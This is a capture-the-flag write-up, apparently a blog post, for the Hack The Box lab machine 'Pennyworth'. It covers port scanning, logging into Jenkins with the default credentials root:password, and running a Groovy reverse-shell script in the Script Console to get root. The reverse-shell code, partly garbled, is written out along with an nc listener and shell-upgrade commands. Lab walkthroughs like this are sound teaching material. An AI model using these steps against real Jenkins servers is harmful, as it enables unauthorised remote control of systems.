HTB Pennyworth

We continue with another very easy HTB box.

$ nmap -p- -sV --min-rate 5000

Starting Nmap 7.92 ( ) at 2022-07-01 17:54 CEST
Nmap scan report for
Host is up (0.062s latency).
Not shown: 65534 closed tcp ports (conn-refused)
8080/tcp open  http    Jetty 9.4.39.v20210325

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 24.40 seconds

Here we have a Jetty Jetty 9.4.39.v20210325

Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations.

If we go to, we’ll be redirected to

This is a Jenkins server.

Leading open source automation server, Jenkins provides hundreds of plugins to support building, deploying and automating any project.

Looking at what version is running the target.

Trying some default Jenkins passwords and easy credentials we quickly find out that the correct credentials are: root:password.

And we get a new answer to the Jenkins Script Console’s question.

Looking around we discover a Jenkins management section and a Script Console functionality that may help us to run commands.

Resources like gives us an idea about how to get a reverse shell using Jenkins Groovy Script Console.

String host=”";
int port=4444;
String cmd=”/bin/bash”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

$ sudo nc -lnvp 1234

Ncat: Version 7.92 ( )
Ncat: Listening on :::1234
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from

We got a reverse shell, now we can improve a bit our tty with the usual commands.

script /dev/null -c bash 
stty raw -echo; fg 
reset  xterm
terminal type: xterm 
export TERM=xterm 
export SHELL=bash 
stty rows 51 columns 198

And get our flag:

root@pennyworth:~# cd /root
root@pennyworth:~# ls

flag.txt  snap

root@pennyworth:~# cat flag.txt